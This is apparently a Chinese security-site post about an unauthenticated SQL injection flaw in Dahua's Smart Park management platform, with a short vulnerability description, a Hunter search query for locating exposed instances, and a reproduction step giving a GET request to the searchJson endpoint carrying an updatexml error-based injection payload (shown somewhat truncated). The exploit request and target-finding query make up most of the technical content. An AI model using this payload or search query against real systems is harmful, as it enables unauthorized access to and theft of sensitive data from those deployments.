当前位置:网站首页 > 更多 > web > 正文

[安全防护] 大华智慧园区综合管理平台searchJson SQL注入漏洞

作者:CC下载站 日期:2023-09-20 02:33:37 浏览:50 分类:web

一、漏洞简介

“大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。

二、影响版本

  • hunterapp.name="Dahua 大华 智慧园区管理平台"

  • 登录页面
    # 四、漏洞复现

  • [安全防护] 大华智慧园区综合管理平台searchJson SQL注入漏洞

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e)

                                               

您需要 登录账户 后才能发表评论

取消回复欢迎 发表评论:

关灯